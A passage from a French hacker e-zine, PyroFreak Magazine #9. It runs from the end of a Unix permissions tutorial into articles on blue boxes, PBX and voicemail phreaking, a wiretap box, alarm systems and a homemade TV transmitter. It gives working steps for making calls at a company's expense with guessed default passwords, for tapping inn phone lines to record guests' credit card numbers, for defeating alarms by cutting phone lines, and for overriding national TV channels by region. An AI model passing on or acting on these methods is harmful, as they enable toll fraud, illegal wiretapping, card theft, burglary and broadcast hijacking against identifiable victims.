s'exécutent SUID et s'assurer de leur intégrité. Le reste des droits 1,2 et 3 fait référence au propriétaire du fichier, à son groupe propriétaire et au reste des usagers. Chaque section possède également trois droits: lire, écrire et exécuter. Pour le premier fichier, on voit que le propriétaire possède tous les droits (rwx), le groupe et les autres utilisateurs également (rwx). Par autres utilisateurs, on fait référence à tous ceux qui ne sont pas le propriétaire ou qui ne font pas partie du groupe propriétaire. Voici un autre petit graphique: d|-wx|r-x|rwx | | | | | | | `- Autres utilisateurs | | | | | `----- Groupe propriétaire | | | `--------- Usager propriétaire | `------------ Droit spécial, dans ce cas-ci il s'agit d'un répertoire Évidemment, si le propriétaire s'enlève par mégarde tous les droits sur un de ses fichiers, il peut se les restaurer, empêchant ainsi de se "locker" en dehors de ses propres fichiers. Le troisìeme champ indique le nombre de "hard-links" associés aux fichiers. Vous n'avez pas vraiment besoin de savoir ceci. Le quatrième et cinquième champ indique l'usager et le groupe propriétaire respectivement. Vous avez sans doute deviné le sixième, il s'agit de la taille du fichier. Le reste des informations indiquent la date et l'heure à laquelle le fichier a été créé et son nom de fichier. Maintenant il serait utile de savoir comme changer les attributs d'un fichier. Cette opération est effectuée avec trois programmes: chmod, chgrp et chown. chmod change les droits du fichier, chgrp change les groupe propriétaire et chown change l'usager propriétaire. Avec chmod la syntaxe est relativement simple, chmod g+wx quake ajoutera au fichier quake les droits d'écriture et de lecture au groupe propriétaire de même que chmod og-rwx enlevera tous les droits au groupe et aux autres utilisateurs. On peut également racourcir la commande en utilisant la syntaxe octale pour les droits comme chmod 700 qui donne tous les droits au propriétaire et qui enlève les droits au reste. Utilisez "man chmod" pour la syntaxe complète de la commande. L'utilisation de chgrp et chown est très simple aussi. ** Fin de la première partie de l'article ** Suite dans le #10 de PyroFreak ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |30-LA BLUE BOX |(X) Phreak ( ) Hack ( ) Autres '.__________Par Toonstuck ________ ______ Toonstuck@aol.com ____ ___ 1) Disclaimer: Je pense que tous bon Newbie a déjà entendu parler de la fameuse "Blue Box", inventée au U.S.A par des étudiants du MIT en 60. J'ai décidé de faire un petit article dessus, malgré son fonctionnement peu fréquent en france, mais intéressent et très instructif. Comme je l'ai dit plus haut, cette box à été inventée par des étudiants dans les année 60, et à été dévelopée par le fameux "Capitaine CRUNCH". Le surnom de "Capitaine CRUNCH", a été tirer d'une boite de céréales. Explications. Immaginez: Capitaine CRUCH mangait ces céréales, lorsque au fond du paquet, il apererçut un petit sifflet cadeau. ... A mon avis, il n'a pas du tout de suite comprendre que ce sifflet pourrai lui servir à quelque chose, mais en l'étudiant... En éffet... Ce sifflet, émmetait une frequence de 2600 hz. Cette frequence en arrivait à brouiller une ligne téléphonique, ou plutôt, de lui faire croire que l'on avaient raccrocher, alors que nous étions toujours en ligne ... Ce qui voulait dire que si Capitaine CRUNCH sifflait dans son peitit instru- ment lors d'une comunication téléphonique banale, il parvenait à contourner les factures téléphoniques, ou bien, téléphoner gratuitement. Pas male le sifflet du Capitaine CRUNCH un ??? Evidement, ce petit objet n'est guère resté longtemp, il a été remplacé par un montage électronique qui émmetait le même signal. 2) 2600. Je vous laisse immaginer qu'une comunication téléphonique ne ce déroule pas par un simple claquement de doigts, et que ce n'est pas des opérateurs qui s'occupent de facturer le temps de comunication, mais en toute logique, des machines. <-- (A mon avis, il n'y aurai largement pas assez d'operateurs pour gérer le nombre d'appels en l'éspace de 30 secondes.) Ceci étant, ce sont des commutateurs et non des opérateurs qui gèrent nos appèls téléphoniques. Ces comutateurs sont placés dans des centrâle de communications, et sont reliés à d'autres même centrâle basées partout dans le monde. Lorsque l'on émmet un appèl téléphonique, nous passons par des comutateurs (minimum 2). Ces derniers, s'échangent des données, ou plutôt des informa- tions concernant le prix à la minute, ... A chaque fin de communications, les deux commutateur ce font: "STOP !". Et oui... C'est à ce moment la que le 2600 Hz intervient. A partir du moment ou vous émettez un appèl vers une ligne éxterieure, les commutateur s'échangeront des signaux: 2600 Hz = Les personnes étant en ligne ont raccrochées. ???? Hz = La ligne du correspondant est occupée. ???? Hz = Le correspondant X a décroché. Temps facturé: XX FF la minute dont XX FF facturé dut au décrochement du correspondant. C'est à peu de choses pret comme celà que ce comunique les comutateurs lors d'un appel téléphonique. Etand donné qu'en France le blue boxing est presque impraticable, le mieux est de ce servir de la blue box vers une ligne téléphonique international et gratuite (0 80099). Cette derniere étant gratuite, elle ne sera pas controlée comme un appel vers une ligne externe payante, donc moins dangereuse. <-- Ex: En france, FT ne s'occupe pas des Numeros verts. Ne connaissant guerre mieu que vous le montage d'une blue box, je vais plutôt me mettre à l'étudier serieusement afin de vous mettre on-line un petit montage fait maison. Hé hé .... By Toonstuck====M.C.9 H.P.C ... ----> ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |31-PHREAK Vmb/PaBX (Newbie) |(X) Phreak ( ) Hack ( ) Autres '.__________Par Toonstuck ________ ______ Toonstuck@aol.com ____ ___ 1) DISCLAIMER. Je sais d'avance ce que vous penssez des définitions : Newbies :"Oh putain c'est con ca sert a rien !". Toonstuck : "Ouais, ca sert à rien, ca sert juste a comprendre ce que vous allez lire par la suite." Newbie :"Comment ca marche le phreaking ? C'est quoi un serveur vocal ?" Toonstuck :"T'inquiète ginette... ta juste à lire" : Comme vous l'avez sûrement constater, une entreprise dispose d'un répondeur (vocal ou non) au cas ou ils ne pourraient vous répondres, et surtout pour les glands qui téléphone après les heures d'ouverture. Sur ces répondeurs, on y trouve souvent des menus du style :"Taper 1 si vous voulez faire une commande, 2 pour...". Admettons que celui-ci aye jusqu'a 4, que se passerait-il si on appuyaient sur 5 ? Et 6, ou alors 47 ?... <-- fonction ne faisant pas partie du menu. Toonstuck :"5". Repondeur :"BIP, cette fonction n'est pas disponible". Toonstuck :"30". Repondeur :"BIP, cette fonction n'est pas disponible". Toonstuck: "pff, 0". Repondeur :"Veuillez entrer votre numéro de boite vocal, suivit de #". Toonstuck :"Vmb ? PaBX ? :)". Le but est de trouver des PaBX, et de si connecter afin de téléphoner gratui- tement, de jouer sur son minitel, appeler des réseaux de cul, fin tout ce que vous voulez... Evidement sur le compte de l'entreprise phreaker. Newbies :"Et Toon, on saient ce qu'ai une PaBX, mais Vmb, c'est quoi ?" La Vmb quant à elle, est un simple répondeur. Si vous tomber sur cette dernière, vous ne pourrez pas téléphoner, en revanche vous aurez un répondeur (pour que vos potes puissent vous laisser des messages). 2) MATOS. 1) Un téléphone à touches (de préf. a cadrent numérique). 2) Deux mains (désoler pour les handicapés). 3) Un cerveau. 3) A L'ATTAQUE. Finit de jouer les enfants... Prenez votre phone, et commencer à scanner des numéros verts. Scanner ? Il vous suffit de prendre un bout de papier, de noter des numéros verts, et de les composer en vérifiant s'il y a un répondeur vocal. Ayant expliquer plus haut ce qu'était ce dernier, je vais passer plus loin. Une fois le PaBX trouver (ce qui n'est pas toujours évident, mais ne vous découragez pas), il vous faut un numéro de Boite vocal se composent de 4 chiffres (la plus part du temps). C'est assez simple, taper des chiffres au hasars tout en les notent. Une fois le n° de BV <-- Boite Vocale effectuer, il vous faut un mot de passe . Evidement, on ne vous le donnera sûrement pas ! Assez souvent, il s'agit du code par défaut, c'est à dire les même chiffres que le numéro de BV. Il vous faudra pas mal de temps avant d'en trouver une bonne. Ceci étant, vous pouvez disposer d'un scanner de numéros verts, dont PhoneTag disponible dans la rubrique "DownLoad" sur le site de pyrofreak.org, qui éffectura tout le travail à votre place. Vous avez pénétrer le système ? Finit les grosses factures du style 3000 balles d'internet. Maman et Papa arrêteront de vous gueuler dessus à cause de ça, et ce demanderont pourquoi il n'y a plus de TRANSPAC sur leur facture détailler. Vous aurez cas leurs dires que vous ne vous connecter plus. Newbie:"Et ?? Toon ! Arrête de raconter ta vie ! Ca n'en finit point !". Oké. Le système pénétrer, une jolie voix douce vous demande de taper le numéro que vous voulez composer suivit de #. Commencer par taper "03612" afin de débloquer le clavier. Par la suite, il vous suffira juste de faire 0, le numéro de téléphone à appeler, suivit de #. Et le tour est jouer. 4) CONNEXION MODEM VIA UN PaBX. Pour cette rubrique, je vais seulement apprendre comment ce connecter à AOL via un PaBX. Desoler pour ceux qui possède un autre Provider. Pour celà, il vous suffit juste d'installer la version 3.0 d'aol. (si vous possedez la 4.0, vous pouvez la virer car le modem n'obtiendra pas de signal de porteuse à la connexion.) Je ne vais pas perdre de temps à faire des détails, alors soyer attentifs: Lorsque vous configurer pour la première fois une versions d'aol, cette dernière vous demande de choisir un lieu, (ou numero de téléphone si vous préferer) afin d'obtenir la connexion. Prenez votre numero habituel. Le choix fait, il vous connecte ou vous ramène vers la page de connexion. Si il vous a connecter, déconecter vous sans quiter. Cliquer sur le petit onglet: "Configuration". Dans le menu suivant, sélectionner: "Domicile", puis: "Modifier le lieu". Commencer d'abord par changer le lieu. Ex: Remplacer "Domicile" par "MANGE MERDE" ou plutôt le nom de la boite que vous phreaker. Dans la case numero de téléphone, il y a du boulot à éffectuer. Admetons que le numero de votre boite soit "0800XXXXXX", que la suite soit "0", le numero de BV "3000", et enfin le Mot de passe "3000". Il faudra la remplire comme ceci: "No de téléphone" (<-- Ne mettez pas 36510800): XXXXXX,,,0,,3000#,3000#,03612#,00836061310#. (Les virgules sont des Variantes. Ce sont elles qui vont s'occuper d'attendre que le repondeur s'enclanche afin de pouvoir taper la suite.: 1 variante = environ 2 seconde de silence. Quand au 03612, il permait de débloquer le clavier.) La case remplit, vous avez une case vide à cocher, ou il est inscrit: "Pour utiliser un Préfixe, composer:". C'est la qu'il faudra mettre le "36510800". Vous pouvez maintenent cliquer sur "enregistrer, et vous connecter à internet temps que vous voulez. Merci qui ? ___By Toonstuck ___ le leader de M.C.9 HPC. M.C.9 H.P.C pour Pyrofreak === GREETZ à Neuro :) hé hé ... ----> Http://www.multimania.com/mch99 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |32-Encore et toujours les Cartes de Crédit |(X) Phreak ( ) Hack ( ) Autres '.__________Par NuClEaR ________ ______ NuClEaR@PyroFreaK.Org __ ___ Disclamer: L'article qui va suivre, a pour buts, de vous éduquer et aussi celui de vous montrer comment faire votre propre téléphone. Donc rien d'illégal. Notice: Je n'est, au grand jamais tester tout ceci. Bon vous voullez trouver des numéro de carte de credit rapidement? Un nouveau moyen s'offre à vous ! La NuClEaR Box ;p C'est un moyen qui est très rapide si jamais ça vous en prend vite fais. La NuClEaR box Une petite box comme ça, que j'ai fais (et qui existe déja sûrement), j'ai juste pas trouvé de shéma et rien sur cela sur le net, c'est pourquoi, on va l'appeler la NuClEaR box. Cette box téléphonique sert surtout pour l'écoute téléphonique, donc elle peux vous être de grande utilité pour plus- ieurs affaires. Vous pouvez écouter, enregistrer Quand vous écoutez, le voyant rouge du téléphone (Vista) ne s'allume pas, car cette box ne change pas le voltage, la box est bracher, et la ligne reste intacte, comme si elle ne serait pas la. Donc vous pouvez la brancher, et le systeme téléphonique va fonctionner normalement. Aussi, vous pouvez rajouter un line in, pour parler sur la ligne, sans que personne sache que vous êtes là. ( Il vous entende, mais le voyant rouge du téléphone de la victime ne s'allume pas pour dire qu'il y a quelqu'un d'autre sur la ligne.) #1: Le shéma: +------C--------+ C+ ¦P1 P2 ¦ +----------------------------------------------+¦¦O¦ O+ O-+O¦ ¦ ¦ +------------------------------------------+++-++ ++---+-+ +----+-A+----------------------------------------+ ++¦ +---------+ ¦ ¦ ¦¦P1++++++P2++ B +-+¦¦ O ¦ O ¦ ¦ ¦¦O+¦O¦¦O¦O-¦+-----------------+ ¦¦¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦¦ ¦ ¦¦+------+--------+ ¦ ¦¦ +--+---++-----------+ ¦ ¦¦ ¦ ¦ ¦¦ ¦ ¦ ¦¦ C++¦ ¦ ¦--------+----------+ ¦¦ ¦ +----++-------+ ¦ ¦ ¦ C+ ¦ ¦¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦¦ C+¦ ¦C- ¦¦ ¦ ¦ ¦ ¦ +---- ¦¦ ¦ ¦ ¦¦ C--¦ ¦ ¦ ¦ E+- ¦¦ ¦ ¦ +---+ ¦ ¦ ¦ ¦ ¦¦ ¦ +-----+++¦ ¦ ++ ¦ ¦ ¦+-+ +-------++¦¦ +--++ ¦ ¦ +-----------+-+--------+-+-------------------------+ ++ ++ ++ ++ F2 Line Out +---+F1 +---+ Line Rec ( in ) +-+ +-+ Legende: E+- Entrer 2 brins, positif, negatif O+ Borne positif pour pince aligator O- Borne négatif pour pince aligator P1 Pince aligator rouge P2 Pince aligator noir C Boite grise d'entré de la ligne de téléphone Section A: Sorti pour écouter C+ Conducteur positif vers rca out( fils ou cuivres sur plaquette de circuit) C- Conducteur négatif vers rca out( fils ou cuivres sur plaquette de circuit) F1 Fiche RCA OUT Section B: Entrer pour parler sur la ligne: C++ Conducteur positif vers rca IN C- Conducteur négatif vers rca IN F2 Fiche RCA IN Bon vous devez monter ce shéma ou bien prendre une prise rca directement et y mettre 2 pinces aligators sur les 2 canaux de la prise rca. Premièrement, ce montage marche sur les lignes à 2 fils de téléphone, ( Il y a 4 fils qui rentrent dans la boîte, mais seulement les 2 d'en haut ou d'en bas fonctionne. Les autres sont normalement pas branchés. Au Québec tout cela fonctionne, mais en France j'en ai aucune idée. Peut-etre qu'il faudrait que vous modifiez un peux la box pour faire une FR-NuClEaR box ;) Section A: Elle sert à écouter sur la ligne, c'est seulement de cela que vous avez besoin pour écouter. Section B: Elle sert pour parler sur la ligne, aucune utilité pour trouver des numéros de carte de crédit, mais elle peut servir à d'autres choses que je n'est pas mentionné. Cette box fonctionne à merveille. L'autre jour je voulais faire une box pour émuler les callers ID, mais il a rien qui a fonctionner. Car Bell ne permet pas d'envoyer rien sur la ligne tant que l'autre n'a pas répondu, et le signal de l'afficheur est entre le 1e et 2e coup, si le gars repond pas ta beau envoyer tout ce que tu veux sur la ligne, ça se rend pas. La raison d'après moi, c'est pour contrer les black boxs ... Mais après, j'ai trouvé cet utilité a la box que j'avais fais. Vous pouvez aussi enregistrer les conversations de chez-vous, moi j'ai un petit radio avec une fiche RCA en arrière pour faire rentrer le signal, pis il peut fonctionner à batteries donc, si vous voullez trouver des numéros de carte de crédit, ca vous prend cela, car quand quelqu'un appel, vous enregistrez toute la conversation sur la cassette, et voila le tour est joué. La meilleur place d'après moi pour en trouver (#cc), c'est les lignes de téléphone des auberges, pour cela, vous essayez de localiser le fil de téléphone qui part du poteau, et qui rentre dans l'auberge. Vous avez une chance sur 2 qu'il y est une petite boite grise sur le mur avant que la ligne rentre en dedans ( surtout sur les vieux batiments ) . Si c'est le cas, vous l'ouvrez et vous pluger les pinces aligators sur les 2 vis qui sert pour faire la jonction des fils. Si ya pas de vis, faîte 2 petites ouvertures sur les fils sans les coupés, juste asser pour voir les fils en dedans de la gaine de plastique, et mettez une pince aligator sur chacuns des 2 brins de fils. Après qu'une de c'est 2 façons de se brancher est été faîte, prenner vôtre petit radio avec prise rca, ou bien de quoi pour écouter ,comme des écouteurs, mais la il faut que vous mettiez une prise phono à la place de la prise rca, et c'est dure de noter tout cela en temps réel, surtout quand t'est à quatre pattes dans 1 pied de neige. C'est pour cela, que je vous conseil d'enregistrer la conversation. Plus haut je vous est dit que c'étais les auberges les meilleurs places pour écouter. Cela est bien vrais car quand quelqu'un fais une réservation, il est oubligé de laisser son numéro de carte de crédit et tout ce qui vient avec pour pouvoir retirez sur la carte, car quand quelqu'un fais une réservation même si il peut pas aller à l'auberge pour quelconque raison, bien l'auberge ramasse (+ ou -) 8%, pour un dédomagement, car il on peut-être manqué une autre réservation avec cette chambre. Donc y se paye un peux pareil, apars les auberges, il y a sûrement des bonnes places pour écouter, à vous de les découvrirs. Aussi la section B c'est pour parler sur la ligne, vous pluger encore le radio avec une sorti RCA ou autre la parce que je vous conseil d'amplifier le signal de sorti et le signal d'entrer, car c'est pas très fort le signal dans la ligne, c'est pour cela que je prend toujours mon petit radio sony. (C) NuClEaR, 2000 NuClEaR@PyroFreaK.Org ICQ: 29956814 Bonne année à tous, et un joyeux nouveau millénaire. +----------------------------------------+ ¦ /========\ ¦ ¦ \\\\\///// ¦ ¦ \\\\//// ¦ ¦ \\\/// ¦ ¦ //\\//\\ ¦ ¦ / ////\\\\\\ ¦ ¦ ///////\\\\\\\ ¦ ¦ ////// \\\\\\\ ¦ ¦ ////// \\\\\\\ ¦ ¦ //\/\// \\/\// ¦ ¦ ¦ ¦ ¦ +----------------------------------------+ P.S: C'est un signe de danger de radiation produit par nuclear hehe ;) C'est dure de faire ca en ascii ! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |33-Les systèmes d'alarme |( ) Phreak ( ) Hack (X) Autres '.__________Par [ewoks] ________ ______ ewoks@pyrofreak.org __ ___ Les systèmes d'alarme: Cet article devrait etre bref car les compagnies dans ce domaine sont très avardes de commentaires et n'aiment pas parler de leur failles. Cet article s'adresse seulement au système d'alarme connecté par une ligne téléphonique. Les anciens systèmes d'alarmes étaient plutôt mal fait car j'ai pu découvrir leur faille en moins de 5 minutes, avant vous n'aviez qu'a engager la ligne de téléphone et le système était neutraliser ce qui n'est pas vraiment fiable, mais maintenant les compagnies de système d'alarme ont pensé mettre le système d'alarme en priorité donc si il y a un quelconque problème il coupe l'appel en cours pour prendre la ligne. Présentement des techniciens mon avoué que Microtec était encore avec le vieux système d'alarme donc aller y fort au maison de microtec mais la plupart des autres compagnies se sont adaptés malgré que plusieurs maisons sont munis de vieille antiquités qu'il croit de bonne qualité. Il y a aussi la possibilité d'une deuxième lignes se qui est plutôt rare vu le cout que sa l'entraine mais les entrepri- ses se paye en général une deuxième ligne. Pour conclure, le seul moyens apparent pour les système présent est de trouver la box de téléphone et de la déconnecter pour les maisons qui possède des box extérieur ou bien de couper la ligne téléphonique se qui est beaucoup plus compliqué donc c'est pas mal tous et pour toutes informations je vous conseille le social enginering toujours bien pratique. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |34-Emetteur Télé |( ) Phreak ( ) Hack (X) Autres '.__________Par Skywalker ________ ______ Skywalker@caramail.com __ ___ Comme beaucoup de personnes, j'aime ma télé ! (que Dieu me pardonne...) Je constate que la qualite de la programmation ces dernieres annees s'est degradee progressivement (peut etre a cause de l'arrivee de Pascal Bruner ?). Apres de nombreux courriers d'insulte a TF1 et autres, je decidais donc d'agir. Agir, oui mais comment ? Eh bien en creant ma propre programmation ! Je reflechissais donc (c'est assez rare...) et arriva a la conclusion qu' il me fallait un emetteur tele pour realiser ce doux reve... Je me lancais alors dans la realisation de celui ci : ca tombe bien puisque c'est le sujet de cet article. Cet article est a lire au calme. Il n'est pas d'un niveau technique eleve mais peu paraitre peu clair par moments. I. Le matos Ayant un niveau de connaissance en electronique assez faible, je me dis qu'il fallait realiser cet emetteur avec des appareils courants. Voici donc la liste du matos de base qui constituera l'emetteur tele : * 1 tele avec : - 1 peritel (SCART) - 1 entree antenne femelle (coaxiale 75 ohms) * 1 magnetoscope avec : - 1 peritel (SCART) sortie tele - 1 peritel (SCART) entree decodeur - 1 entree antenne femelle (coaxiale 75 ohms) - 1 sortie antenne male (coaxiale 75 ohms) - 1 possibilite de reglage "CANAL" * 1 amplificateur tele bande large (UHF/VHF) avec : - 1 entree antenne femelle (coaxiale 75 ohms) - 1 sortie antenne male (coaxiale 75 ohms) - 1 gain d'amplification eleve (30 db) * 1 antenne emetrice (voir la suite pour detail) REMARQUE : Plus les possibilites de reglage du "CANAL" sont larges et plus les frequences d'emissions pourront etre variees. Plus le gain de l'ampli sera eleve et plus la puissance d'emission sera importante. II. La theorie Pour enregistrer une emission hertzienne grace au magnetoscope, il faut : - connecter l'entree antenne du magneto a l'antenne hertzienne - connecter la sortie antenne du magneto a l'entree antenne de la tele - regler la reception des chaines tele sur le magneto Lorsque le magneto enregistre une emission, il enregistre le signale electromagnetique venant par son entree antenne. Ce signale electromagnetique a ete receptionne par l'antenne hertzienne, amplifie par un ampli puis envoyer a l'entree antenne du magneto. Le magneto va a nouveau amplifier ce signale pour l'enregistrer sur la bande magnetique de la cassette magneto. Si il n'y a aucun enregistrement, le magneto va simplement amplifier le signale electromagnetique, puis le transmettre via sa sortie antenne a l' entree antenne de la tele. En realite, les connecteurs antenne du magneto correspondent a un modulateur HF. Ce modulateur transforme les signaux video et son (recu a son entree antenne) afin de les transmettre a l'entree antenne de la tele (via la sortie antenne du magneto). On appelle "frequence de sortie" du modulateur HF, la frequence d'emission de sortie (sortie antenne du magneto). La gamme de frequence d'emission tele est divisee en Bandes. Il y a 4 Bandes. Chaque Bande est decoupes en Canaux. Voici un petit tableau pour t'y retrouver : GAMME CANAUX FREQUENCE UHF Bande I 02-04 UHF Bande III 05-10 041-270 Mhz VHF Bande IV+V 21-69 470-890 Mhz Peu de personnes le savent mais l'on peut se passer d'une connection peritel entre le magneto et la tele pour regarder une cassette video ! Le schema suivant illustre la connection classique magneto-tele : *********** ********** * * sortie peritel du magneto vers entree peritel tele * * * Magneto *------------------------->----------------------------* Tele * * * * * * * * * * * sortie antenne magneto vers entree antenne tele * * * *------------------------->----------------------------* * * * * * *********** ********** : ************* ************ : vers entree antenne magneto * * * * --------------<----------------* Ampli *-<-* Antenne * * * * * ************* ************ Voici maintenant le schema peu classique d'une connection magneto-tele : *********** ********** * * * * * Magneto * * Tele * * * * * * * * * * * sortie antenne magneto vers entree antenne tele * * * *------------------------->----------------------------* * * * * * *********** ********** : ************* ************ : vers entree antenne magneto * * * * --------------<----------------* Ampli *-<-* Antenne * * * * * ************* ************ Avec cette connection, il est possible de regarder une cassette video. Pour cela, il faut que la frequence de sortie du modulateur HF corresponde a a la frequence du canal de la chaine du televiseur. Prenons un exemple : Soit la tele allumer sur la chaine 1 (TF1) dont le canal d'emission est 25 (Paris). Pour que l'image de la cassette lue par le magneto defile sur l'ecran de la tele (TF1), il faut que la frequence de sortie du modulateur HF soit regler sur le canal 25. Le modulateur HF apparait donc simplement comme un emetteur tele. Le but du jeux va consister a amplifier le signale de sortie du modulateur HF (donc l'image de la cassette video en lecture) puis a l'emettre via une antenne. En inversant le sens d'amplification des ampli (sortie->entree et entree->sortie), l'amplification de ce signale va etre possible. Voila pour la theorie. III. Le montage de l'emetteur Bon, alors la je vous previens, il va falloir bidouiller quelques fois la connectique des liaisons entre elements. Laissez votre instinct vous guider... Tout d'abord, ci dessous le schema global : *********** * * * * ********** ************ * * sortie antenne magneto vers * * * * * Magneto *------------------------->----------* Ampli *-->-* Antenne * * * entree antenne ampli * * * * *********** øøøøøø ********** ************ : : ********* : sortie peritel magneto vers entree peritel tele * * --------------------------------->------------------* Tele * * * ********* Voila l'emetteur tele de base. La liaison magneto-tele par peritel sert a visualiser le programme emis par l'emetteur. Le signale de sortie du magneto (modulateur HF) arrive a l'entree antenne de l'ampli. On obtiendra donc a la sortie antenne de l'ampli, un signal amplifie. Le mieux est de mettre "a la chaine" plusieurs ampli : le signale sera de plus en plus amplifie mais ATTENTION, plus le nombre d'ampli augmente et plus le signale contient d' autres signales parasites amplifies eux aussi. Le signale de la cassette video sort donc tres amplifie a la fin de "la chaine" d'ampli. Le signale est a ce stade pres a etre emis. Mais comment me direz vous ? Eh bien grace a une antenne emetrice... IV. L'antenne Tout depend de votre strategie d'emission car toutes les antennes n'emettent pas de la meme maniere suivant leurs formes. Dans le cas ou vous voulez emettre dans une direction bien precise, la meilleurs forme d'antenne est celle du "rateau". C'est l'antenne hertzienne classique. Il existe 2 types d'antenne selon le type d'emission (VHF ou UHF). Les antennes UHF se distinguent des antennes VHF par la forme en "V" de l'une de leur extremite. Leur taille varie de 0.72 m a 2.25 m. L'antenne se compose d'"elements" qui sont en faite les petites tiges qui caracterises le rateau. Le nombre d'elements par antenne varie de 23 a 91 pour les antennes UHF et de 8 a 10 elements pour les antennes VHF. La grandeur et le nombre d'elements de l'antenne sont un facteur de qualite dans l'emission du signale. Plus le nombre d'elements est grand et plus les signales parasites s'estompent. Plus la taille de l'antenne est grande et plus la qualite de l'image est belle. Dans le cas ou vous voulez emettre tout autour de vous a la fois, la meilleur antenne est une antenne de CB fixe type "FULL BAND". Elle ressemble a un grand mat metallique. Ce type d'antenne couvre en general la plage des 25-1300 Mhz. Elle convient donc autant pour une emission UHF que pour une emission VHF. REMARQUE: Pour un meme facteur d'amplification, la puissance d'emission sera moins importante sur une antenne FULL BAND que sur une antenne du type "rateau". V. Utilisation Il ne te reste plus qu'a choisir un canal d'emission pour realiser la tele de tes reves. Chaque region a des canaux d'emissions differents pour les chaines nationales. Le tableau suivant donne les canaux des chaines nationales par regions : ****************************************************************************** EMETTEUR REGIONAL CANAUX ------------------------------------------------------------------------------ TF1 FR2 FR3 C+ 5 M6 ------------------------------------------------------------------------------ Abbeville 63 57 60 07 36 Ajjacio 31 21 24 04 Alberville 45 39 42 07 36 29 Alencon 48 51 54 Ales 27 21 24 65 60 Amiens 41 47 44 49 52 Angers 47 44 41 10 50 53 Angouleme 44 47 41 09 31 34 Annecy 64 58 61 07 45 42 Arcachon 52 49 55 06 34 32 Argenton Sur Creuse 46 40 43 Arnay Le Duc 36 30 33 08 Aubenas 50 53 56 07 Aurillac "Auvergne" 54 Aurillac "Bastide" 09 Aurillac "Quercy" 59 65 62 Autun 48 51 54 67 Auxerre 37 31 34 Avignon 42 45 39 47 54 Bar Le Duc 51 48 54 Bastia 41 47 44 02 Bayonne 64 58 61 07 56 45 Beauvais 41 47 44 49 52 Belfort 30 Bergerac 37 34 31 Besancon 47 41 44 03 45 Besancon "Montfaucon" 29 23 26 08 Bordeaux "Bouliac" 63 57 60 08 65 43 Bordeaux "Cauderan" 23 26 29 10 30 33 Boulogne 29 34 37 10 Bourges 23 26 29 08 21 56 Brest 27 21 24 10 34 60 Brive 23 29 26 06 21 48 Caen 22 25 28 09 38 60 Carcassonne 64 58 61 03 66 Chambery 29 26 23 08 55 52 Chamonix 25 28 22 Champagnolle 58 61 64 Chartres 55 50 53 09 47 44 Chaumont 52 49 55 Cherbourg 65 59 62 06 35 Clermont-ferrand "Puy de Dome" 22 28 25 05 30 33 Clermont-ferrand "Grave Noire" 47 41 44 04 58 61 Cluzes 56 50 53 06 Corte 51 61 54 07 Dieppe 09 Dijon 59 62 65 09 46 43 Dunkerque 42 39 45 59 62 Epinal 65 60 63 10 Eu 08 Forbach 47 22 25 28 Gap "Mont Colombis" 27 21 24 09 Gap "Romette" 07 Gex 27 21 24 05 Grenoble "Chamrousse" 56 50 53 06 Grenoble "Tour sans venin" 09 59 62 Gueret 64 58 61 09 Hirson 54 48 51 Hyeres 65 59 62 06 La Rochelle 48 51 Laval 63 57 60 Le Creusot 35 33 30 67 38 60 Le Havre "Harfleur" 46 43 40 05 53 Le Havre "Basse Normandie" 35 Le Mans 24 27 21 05 Lens 51 54 Le Puy 63 57 60 06 Lesparre 39 45 42 Lille 27 21 24 05 65 53 Limoges 56 50 53 10 38 Longwy 52 47 44 08 Lorient 62 65 Lyon "Fourviere" 61 58 64 66 28 22 Lyon "Mont Pilat" 46 40 43 10 59 62 Macon 57 55 49 Mantes 64 58 61 09 55 53 Marseille "Grande Etoile" 29 23 26 05 32 38 Marseille "Pomegues" 40 46 43 57 54 Maubeuge "Rousis" 39 42 45 29 32 Mende 37 31 34 68 Menton 62 50 56 68 Metz 37 34 31 05 39 Mezieres 29 23 26 36 69 Millau 47 44 41 10 Monnetier Mernex 42 45 48 64 Mont Brian 04 Montlucon 63 57 60 07 49 52 Montmellan 64 58 61 09 Montpellier "La Blanquette" 56 50 53 09 Montpellier "St Baudille" 63 48 Mortain 50 52 55 Morteau 48 54 51 Mulhouse 27 21 24 05 Nancy 23 29 26 08 55 43 Nantes 23 29 26 09 21 65 Neufchatel 51 48 54 65 Nice 64 58 61 66 51 Noirt "Maisonnay" 22 28 25 06 38 Noirt "Sud Vendee" 58 Nolay 06 Orleans 42 39 45 52 53 Paris "Tour Effeil" 25 22 28 06 30 33 Paris Est 43 46 40 53 48 58 Paris Nord 45 39 56 59 65 62 Paris Sud 49 52 62 65 58 42 Parthenay 52 49 55 Pau 60 63 Perpignan 22 25 28 07 38 35 Pignans 46 43 40 56 Poitiers 08 41 44 Porto Vecchio 40 34 37 Privas 64 58 61 Reims 43 46 40 09 53 56 Renne 39 45 42 07 34 31 Roanne 08 34 31 Rodez 36 39 34 06 42 Rouen 23 33 26 07 59 62 Sables d'Olonnes (les) 07 Saint Etienne 35 30 33 38 65 62 Saint Flour 52 49 55 07 Saint Gingolph 41 39 63 Saint Martin de Belleville 48 51 54 08 Saint Nazaire Pornichet 23 29 26 06 55 52 Saint Raphael 25 28 22 10 36 39 Sarrebourg 40 53 50 Sens 57 63 60 05 47 44 Serres 50 53 56 04 Starsbourg 62 56 43 10 Tarascon Sur Arriege 52 55 49 08 Toulon 51 48 54 09 57 60 Toulouse "Bonhoure" 32 34 Toulouse "Pechbonnieu 45 39 42 07 Toulouse "Pic Du Midi" 27 21 24 05 29 38 Toulouse "Aquitaine" 47 Tourette Du Chateau 54 62 65 Tours 65 59 62 10 57 54 Troyes 27 24 21 07 29 Ussel 42 45 39 04 57 60 Utelle 47 44 41 Valence 53 Valenciennes 49 34 Vannes 50 56 53 05 58 48 Verdun 65 59 62 Villers Cotterets 65 59 62 39 57 Vittel 30 35 32 Voiron 05 Wissenbourg 54 48 51 ****************************************************************************** Admettons que l'emetteur de ta ville soit a Amiens. Le tableau ci avant indique que TF1 emet ses programmes sur le canal 41. Toi, tu regles ton emetteur sur le canal 41 (pas toujours possible suivant le materiel dispo), tu emets par exemple un bon vieux film de cul ;) 2 possibilites maintenant : - Soit le signale emis est puissant, et la, toutes les personnes de ta ville regardant TF1 a ce moment la voient ton film de cul...;) - Soit le signale emis n'est pas assez puissant, et la, 